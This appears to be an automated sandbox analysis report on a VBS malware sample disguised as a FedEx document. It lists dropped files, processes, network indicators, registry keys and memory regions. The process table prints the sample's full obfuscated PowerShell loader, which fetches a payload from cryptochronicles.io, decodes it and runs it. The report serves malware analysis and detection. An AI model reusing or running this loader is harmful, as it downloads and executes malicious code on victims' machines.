Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
CR-FEDEX_TN-775537409198_Doc.vbs
|
ASCII text, with very long lines (591), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11u3vlih.0ih.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dgufca1.ras.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CR-FEDEX_TN-775537409198_Doc.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping google.com -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function
Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne
-lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne,
$Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/
H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama
TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam)
Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe
io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin
Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl
Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm
Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske
'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea
ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb
ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems
PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl
Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene
Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem
$,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia
BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e
eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp
');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs
Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHftesoKasseu eromsWalki],hoto= Swiz$ Par F ejrrDefiniEl.cte SnuprNr.esiComba
');$Klavringernes=Tabellariske ',opias VandoeyebalFelteoInd.vsa delpOmdigiSu epl,rbejsPipp .La.erD,nfrioOpjuswSalpenMesual
Deoro teskaDipoldSpillFPacifiFiskelrockseSkils( Fej.$P,abeVCarlooAntiklKonfio Bundw Gul 1Bagbo5A yno9 Logi,Unslu$VigtiA Tegmnol.nek
raspeUnautrAbrentBorlao ablivafstieEnsur)Sec n ';$Klavringernes=$Rossellinis[1]+$Klavringernes;$Ankertove=$Rossellinis[0];Gdedes
(Tabellariske 'S.ffg$S,bbagRe.nflUbefooDys.nbAner a Carplr,tif:,obisF afizr OrphuInt,rg UnbrtTeknobLnsl.aPlainrFrasigFastgrPaickeUnspurRetra=M
seg(SukkuT,roomefjerrsResentMakul-AliauP AtteaSpindtOverfhVandf exa i$Sk,ttA commnVe.nikUn,ove Au.frAbbretVin,ioDe itv LinceA.skr)
Rett ');while (!$Frugtbargrer) {Gdedes (Tabellariske 'Jerng$ MerrgAarsrlOptegoHamshb denaaBard lUstem:OvergS I,ery UsannsnekktInhumhInd.aeEngh.t
I raiFeriezCirkueV,ema=Fores$TeglbtUnderrDiagouKup feInves ') ;Gdedes $Klavringernes;Gdedes (Tabellariske 'CyberSEnesttSalutaOpe,sr
Naalt Quee-EkstrSRosellDemi,eForsteVariop refa Fluk4Gonyd ');Gdedes (Tabellariske 'Deta $RejecgR tsblZonolo .lotb misua MisllB,lle:KrigsFS,iborKeratu
,ansgS,mittSpr tb CoraaSpondrforsvgHellmr No.ceSk,anrSa,dw=Fulds( RegeT Las,ePol,asIsomytGraat- DobsPPiacuaTv.ngtP inthGrote
Reass$Ya,ilADispenDep.skFjrteeKavalrNeo.etRumbloKampkv.esoneOverh)Freud ') ;Gdedes (Tabellariske 'Caddi$,himagTold lStandoAdoxybHiks
aGeotelT,lea:ReaccTSuperrDucesu SebomSundsbRoityuE,uislLapwil alle=Fejlr$TonyagHollylPoly.oSerapbB,byeaR,drilVasew:PulteRHjertoSuppocUsknsk
HypoefranatPseuds onseo in,vnNcr.adVal reBrend+Fissi+Tekst%Brkke$Saltwe avekk NonisAsta p exadeCruderConcot M sal Footi MononEdderi
Til eAnmelnPocke.fa.tocLimsioHappeucoatcnVi,out ,oub ') ;$Volow159=$ekspertlinien[$Trumbull];}Gdedes (Tabellariske ' Indk$mar,ig
AmpllSadd,o H.libpolluatv,salBag p: Galls aneltsejr uFribidBecchi B.mbeSupersDicertslidba Ph.trS.vmut BarkePedatnNotatsPenep
.aban= Sch, AbonnG kloveOccastFunki-benigCFaglro Ma ynslogetTrummeRhysln BucktS olo Pha c$ aloAHun anU,dsikVarineGloeorFranctArtero
H anvRenoveBibli ');Gdedes (Tabellariske ' Lupo$LegisgGalenlReempoUnderbCoccaaKillil Apo.:v.gtiMSoy saRenovrUndergPr.enr RepriH.ksetForldtprei,
Brdgr=Sc pi Styr[ IgniSS,ratyJibeds Rep t Autoe aarem Dall.StorsCPegleoSupranFlokuv DefleFossirApol.tAzofo]hydro:Unhog:Ro.usFRe,ssrnonaso
dekomam,noBPreseaSavvrs Ungre M ri6,iled4TetroS.ardatFoyairW.sleiRowlonMaringIn.ox(Indha$P.ntssOpvejtIntrauSt ttd.eliei SmaseP
otosPrintt ,nasaLa gtrIdriftSaftfe,allanc.ntas,usto) eres ');Gdedes (Tabellariske 'Hidse$ o cug Predl ErucoLinchbGam eaIguanl
Gg,e:B.gmaTlambar MailaMa.chpIs,pepValene Skama.ngdof t,sesOrdinaAnt,otskratsFlytteApayanAller2 S,hi8Undut S,egl= Poli Jakke[guldsSKronry
A.tas ImpotCry.te,evalmSkrle.UglisT Wan.eSexlexSurtat Kat,.ElasmELandbninwo,cGrinco Upprd.empeiZelann eukigSail,]Fjort:Tilbu:
Du.gA AngkSAbbreCForseIholodIT,akt. diveGSystee,rilltTsarrSBispitDiskbrProngiHy ern bedrgMonos( Paed$KnbesMsparkaBjr erAllesg,egahrPa.kyi
MedltTri.ytTroph) Sain ');Gdedes (Tabellariske 'S.abi$ chamg,nasslEclogo.dlbsbGeneraMonotl Lage:Re.urH ZoneeOver.lBarnabDodonrselvseKorpodChipbe
dados Sklm=Unpor$BolsmTUnoxirGo rmaocca pIdoispKiddyeKlammaTredrfSacrasRe utabyraatFeyess SledeAdresn tlnd2cocks8Penny.DigitsLukrzuShowgbUva,osSeasitSpedirStilliSlavinPhotag
.alc(Death3Thear2Allow9Bekko6 Afte9 Apot6Rem,u, Sig.2 Fdev9 extr0Kendt2Skrig3 For.) Frem ');Gdedes $Helbredes;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\paraderingerne.Ste && echo $"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://cryptochronicles.io0
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://cryptochronicles.io/mgbo1/Noninstrumentally.qxdP
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://cryptochronicles.io
|
unknown
|
||
|
http://cryptochronicles.io/mgbo1/Noninstrumentally.qxd
|
192.185.84.89
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
cryptochronicles.io
|
192.185.84.89
|
||
|
google.com
|
142.250.65.238
|
||
|
windowsupdatebg.s.llnwi.net
|
69.164.46.0
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.65.238
|
google.com
|
United States
|
||
|
192.185.84.89
|
cryptochronicles.io
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
28413119000
|
heap
|
page read and write
|
||
|
28412F4F000
|
heap
|
page read and write
|
||
|
21001D48000
|
trusted library allocation
|
page read and write
|
||
|
28411140000
|
heap
|
page read and write
|
||
|
210015E5000
|
trusted library allocation
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
7FFAACBB4000
|
trusted library allocation
|
page read and write
|
||
|
28412F65000
|
heap
|
page read and write
|
||
|
284111BB000
|
heap
|
page read and write
|
||
|
21000575000
|
trusted library allocation
|
page read and write
|
||
|
2106CB80000
|
heap
|
page read and write
|
||
|
21000B8A000
|
trusted library allocation
|
page read and write
|
||
|
2106EE60000
|
heap
|
page read and write
|
||
|
2106CDF0000
|
heap
|
page read and write
|
||
|
21001AF7000
|
trusted library allocation
|
page read and write
|
||
|
284111E9000
|
heap
|
page read and write
|
||
|
2106CDC3000
|
heap
|
page read and write
|
||
|
612947A000
|
stack
|
page read and write
|
||
|
2C9C07F0000
|
heap
|
page read and write
|
||
|
21000FBD000
|
trusted library allocation
|
page read and write
|
||
|
28412F5B000
|
heap
|
page read and write
|
||
|
284130A8000
|
heap
|
page read and write
|
||
|
28412F63000
|
heap
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
284130D0000
|
heap
|
page read and write
|
||
|
2106CDD0000
|
heap
|
page read and write
|
||
|
2100146F000
|
trusted library allocation
|
page read and write
|
||
|
284130D0000
|
heap
|
page read and write
|
||
|
28412F4F000
|
heap
|
page read and write
|
||
|
2C9C04D0000
|
heap
|
page read and write
|
||
|
7FFAACBCB000
|
trusted library allocation
|
page read and write
|
||
|
28412F55000
|
heap
|
page read and write
|
||
|
2106CD25000
|
heap
|
page read and write
|
||
|
21001A3D000
|
trusted library allocation
|
page read and write
|
||
|
2841306F000
|
heap
|
page read and write
|
||
|
28411288000
|
heap
|
page read and write
|
||
|
28412F4F000
|
heap
|
page read and write
|
||
|
21001BF0000
|
trusted library allocation
|
page read and write
|
||
|
2100175D000
|
trusted library allocation
|
page read and write
|
||
|
284111E9000
|
heap
|
page read and write
|
||
|
284130A8000
|
heap
|
page read and write
|
||
|
CE008FD000
|
stack
|
page read and write
|
||
|
284130A9000
|
heap
|
page read and write
|
||
|
2106EEC5000
|
heap
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
21010001000
|
trusted library allocation
|
page read and write
|
||
|
2841312B000
|
heap
|
page read and write
|
||
|
284110B0000
|
heap
|
page read and write
|
||
|
21001835000
|
trusted library allocation
|
page read and write
|
||
|
284130C9000
|
heap
|
page read and write
|
||
|
BC4CBFE000
|
stack
|
page read and write
|
||
|
28413141000
|
heap
|
page read and write
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
21000AAE000
|
trusted library allocation
|
page read and write
|
||
|
28413119000
|
heap
|
page read and write
|
||
|
2106E6C0000
|
heap
|
page execute and read and write
|
||
|
2106ED30000
|
heap
|
page execute and read and write
|
||
|
28412F40000
|
heap
|
page read and write
|
||
|
CE00AFF000
|
stack
|
page read and write
|
||
|
BC4CFFD000
|
stack
|
page read and write
|
||
|
284130A5000
|
heap
|
page read and write
|
||
|
284130FB000
|
heap
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
21001A65000
|
trusted library allocation
|
page read and write
|
||
|
210019C0000
|
trusted library allocation
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
61286F7000
|
stack
|
page read and write
|
||
|
28411130000
|
heap
|
page read and write
|
||
|
284131DF000
|
heap
|
page read and write
|
||
|
2106EB87000
|
heap
|
page execute and read and write
|
||
|
284111C7000
|
heap
|
page read and write
|
||
|
28411113000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page execute and read and write
|
||
|
21001A78000
|
trusted library allocation
|
page read and write
|
||
|
2841309F000
|
heap
|
page read and write
|
||
|
BC4CEFF000
|
stack
|
page read and write
|
||
|
284130A9000
|
heap
|
page read and write
|
||
|
28413164000
|
heap
|
page read and write
|
||
|
BC4D0FB000
|
stack
|
page read and write
|
||
|
2106CD21000
|
heap
|
page read and write
|
||
|
284111BB000
|
heap
|
page read and write
|
||
|
284130DF000
|
heap
|
page read and write
|
||
|
6127FEF000
|
stack
|
page read and write
|
||
|
284130A8000
|
heap
|
page read and write
|
||
|
2106EB90000
|
heap
|
page read and write
|
||
|
BC4D4FB000
|
stack
|
page read and write
|
||
|
7FFB22682000
|
unkown
|
page readonly
|
||
|
28412F4E000
|
heap
|
page read and write
|
||
|
2106CE50000
|
heap
|
page read and write
|
||
|
284111A0000
|
heap
|
page read and write
|
||
|
28411168000
|
heap
|
page read and write
|
||
|
210018F0000
|
trusted library allocation
|
page read and write
|
||
|
2106CDFB000
|
heap
|
page read and write
|
||
|
28412A50000
|
remote allocation
|
page read and write
|
||
|
284130D0000
|
heap
|
page read and write
|
||
|
61285FE000
|
stack
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
2106CD16000
|
heap
|
page read and write
|
||
|
61294CE000
|
stack
|
page read and write
|
||
|
2841309F000
|
heap
|
page read and write
|
||
|
210017E1000
|
trusted library allocation
|
page read and write
|
||
|
2841309F000
|
heap
|
page read and write
|
||
|
21001CB7000
|
trusted library allocation
|
page read and write
|
||
|
2841308E000
|
heap
|
page read and write
|
||
|
2106EE53000
|
trusted library allocation
|
page read and write
|
||
|
2C9C06D0000
|
heap
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2841128B000
|
heap
|
page read and write
|
||
|
284111B7000
|
heap
|
page read and write
|
||
|
7FFB22685000
|
unkown
|
page readonly
|
||
|
2100126A000
|
trusted library allocation
|
page read and write
|
||
|
21002089000
|
trusted library allocation
|
page read and write
|
||
|
2100169F000
|
trusted library allocation
|
page read and write
|
||
|
28412F5E000
|
heap
|
page read and write
|
||
|
210011D8000
|
trusted library allocation
|
page read and write
|
||
|
2C9C04DB000
|
heap
|
page read and write
|
||
|
61284FC000
|
stack
|
page read and write
|
||
|
28412F4E000
|
heap
|
page read and write
|
||
|
28412FF9000
|
heap
|
page read and write
|
||
|
21000B55000
|
trusted library allocation
|
page read and write
|
||
|
2841312B000
|
heap
|
page read and write
|
||
|
2841308E000
|
heap
|
page read and write
|
||
|
210016BF000
|
trusted library allocation
|
page read and write
|
||
|
2106CE40000
|
heap
|
page readonly
|
||
|
2106CE55000
|
heap
|
page read and write
|
||
|
28413340000
|
heap
|
page read and write
|
||
|
284111F4000
|
heap
|
page read and write
|
||
|
2100184B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28412F4E000
|
heap
|
page read and write
|
||
|
28412F9A000
|
heap
|
page read and write
|
||
|
28412F8B000
|
heap
|
page read and write
|
||
|
28411131000
|
heap
|
page read and write
|
||
|
284111B7000
|
heap
|
page read and write
|
||
|
BC4C8F9000
|
stack
|
page read and write
|
||
|
7FFB22676000
|
unkown
|
page readonly
|
||
|
21001062000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBB2000
|
trusted library allocation
|
page read and write
|
||
|
28412F97000
|
heap
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
2841309F000
|
heap
|
page read and write
|
||
|
21001D54000
|
trusted library allocation
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
28411280000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
284130BB000
|
heap
|
page read and write
|
||
|
2841128D000
|
heap
|
page read and write
|
||
|
284130D0000
|
heap
|
page read and write
|
||
|
21001C2E000
|
trusted library allocation
|
page read and write
|
||
|
210019CD000
|
trusted library allocation
|
page read and write
|
||
|
210015BC000
|
trusted library allocation
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
284130C9000
|
heap
|
page read and write
|
||
|
21001BDB000
|
trusted library allocation
|
page read and write
|
||
|
2106CD60000
|
heap
|
page read and write
|
||
|
2841312B000
|
heap
|
page read and write
|
||
|
2841318F000
|
heap
|
page read and write
|
||
|
284130C9000
|
heap
|
page read and write
|
||
|
284130C8000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
21001482000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB22680000
|
unkown
|
page read and write
|
||
|
2106CE00000
|
trusted library section
|
page read and write
|
||
|
2841308C000
|
heap
|
page read and write
|
||
|
7FFB22682000
|
unkown
|
page readonly
|
||
|
2106E6D0000
|
heap
|
page read and write
|
||
|
7FFAACC0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
21001D4E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
28413341000
|
heap
|
page read and write
|
||
|
210009DF000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
284130D0000
|
heap
|
page read and write
|
||
|
7FFAACD61000
|
trusted library allocation
|
page read and write
|
||
|
2841128B000
|
heap
|
page read and write
|
||
|
284111F4000
|
heap
|
page read and write
|
||
|
284130C9000
|
heap
|
page read and write
|
||
|
21000085000
|
trusted library allocation
|
page read and write
|
||
|
28412FD7000
|
heap
|
page read and write
|
||
|
28412A50000
|
remote allocation
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
2106EF01000
|
heap
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
28412FD8000
|
heap
|
page read and write
|
||
|
28412F4C000
|
heap
|
page read and write
|
||
|
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
|
21001549000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
61289FE000
|
stack
|
page read and write
|
||
|
2106E600000
|
trusted library allocation
|
page read and write
|
||
|
28412F5A000
|
heap
|
page read and write
|
||
|
28413041000
|
heap
|
page read and write
|
||
|
21000431000
|
trusted library allocation
|
page read and write
|
||
|
284130C5000
|
heap
|
page read and write
|
||
|
2841311A000
|
heap
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
21001A99000
|
trusted library allocation
|
page read and write
|
||
|
28412FD9000
|
heap
|
page read and write
|
||
|
7FFAACF20000
|
trusted library allocation
|
page read and write
|
||
|
2106CD5E000
|
heap
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC66000
|
trusted library allocation
|
page read and write
|
||
|
2100148E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
2841128A000
|
heap
|
page read and write
|
||
|
28413216000
|
heap
|
page read and write
|
||
|
28411168000
|
heap
|
page read and write
|
||
|
284111A0000
|
heap
|
page read and write
|
||
|
28412F76000
|
heap
|
page read and write
|
||
|
284111A2000
|
heap
|
page read and write
|
||
|
21001997000
|
trusted library allocation
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
2106EEB8000
|
heap
|
page read and write
|
||
|
284111F4000
|
heap
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
BC4C9FE000
|
stack
|
page read and write
|
||
|
7FFB22676000
|
unkown
|
page readonly
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
28412F4E000
|
heap
|
page read and write
|
||
|
28413065000
|
heap
|
page read and write
|
||
|
21000EED000
|
trusted library allocation
|
page read and write
|
||
|
BC4CAFE000
|
stack
|
page read and write
|
||
|
210010AD000
|
trusted library allocation
|
page read and write
|
||
|
284130E7000
|
heap
|
page read and write
|
||
|
210101AF000
|
trusted library allocation
|
page read and write
|
||
|
21001BB2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD6A000
|
trusted library allocation
|
page read and write
|
||
|
210015F8000
|
trusted library allocation
|
page read and write
|
||
|
28413140000
|
heap
|
page read and write
|
||
|
28412F41000
|
heap
|
page read and write
|
||
|
2106EB80000
|
heap
|
page execute and read and write
|
||
|
28412A50000
|
remote allocation
|
page read and write
|
||
|
612897E000
|
stack
|
page read and write
|
||
|
21000477000
|
trusted library allocation
|
page read and write
|
||
|
21001765000
|
trusted library allocation
|
page read and write
|
||
|
21001D76000
|
trusted library allocation
|
page read and write
|
||
|
2841309F000
|
heap
|
page read and write
|
||
|
28412F53000
|
heap
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
7FFAACBDD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2106E670000
|
trusted library allocation
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
210009F3000
|
trusted library allocation
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
210019F6000
|
trusted library allocation
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
28412F7B000
|
heap
|
page read and write
|
||
|
7FFB22661000
|
unkown
|
page execute read
|
||
|
2841312B000
|
heap
|
page read and write
|
||
|
7FFAACC96000
|
trusted library allocation
|
page execute and read and write
|
||
|
612867E000
|
stack
|
page read and write
|
||
|
28412B00000
|
heap
|
page read and write
|
||
|
2106CDF5000
|
heap
|
page read and write
|
||
|
28413119000
|
heap
|
page read and write
|
||
|
61287F9000
|
stack
|
page read and write
|
||
|
2106ED70000
|
heap
|
page read and write
|
||
|
284131BA000
|
heap
|
page read and write
|
||
|
28412F86000
|
heap
|
page read and write
|
||
|
284130C3000
|
heap
|
page read and write
|
||
|
284130A5000
|
heap
|
page read and write
|
||
|
28412F5E000
|
heap
|
page read and write
|
||
|
28412F9E000
|
heap
|
page read and write
|
||
|
284130A9000
|
heap
|
page read and write
|
||
|
28411187000
|
heap
|
page read and write
|
||
|
28412F5E000
|
heap
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
2106CE30000
|
trusted library allocation
|
page read and write
|
||
|
284130B5000
|
heap
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
|
2100123E000
|
trusted library allocation
|
page read and write
|
||
|
2106EE50000
|
trusted library allocation
|
page read and write
|
||
|
6128AFB000
|
stack
|
page read and write
|
||
|
284111AE000
|
heap
|
page read and write
|
||
|
7FFB22680000
|
unkown
|
page read and write
|
||
|
2841318E000
|
heap
|
page read and write
|
||
|
28412F83000
|
heap
|
page read and write
|
||
|
2106E6E9000
|
heap
|
page read and write
|
||
|
2106E630000
|
trusted library allocation
|
page read and write
|
||
|
28413127000
|
heap
|
page read and write
|
||
|
7FFB22661000
|
unkown
|
page execute read
|
||
|
2106CCC0000
|
trusted library section
|
page read and write
|
||
|
2106EE92000
|
heap
|
page read and write
|
||
|
284130CD000
|
heap
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
21001860000
|
trusted library allocation
|
page read and write
|
||
|
2106CC60000
|
heap
|
page read and write
|
||
|
2100127E000
|
trusted library allocation
|
page read and write
|
||
|
2841328D000
|
heap
|
page read and write
|
||
|
7FFAACD92000
|
trusted library allocation
|
page read and write
|
||
|
21000001000
|
trusted library allocation
|
page read and write
|
||
|
284131BB000
|
heap
|
page read and write
|
||
|
7FFAACC6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
BC4D3FF000
|
stack
|
page read and write
|
||
|
2106EBF4000
|
heap
|
page read and write
|
||
|
2100111D000
|
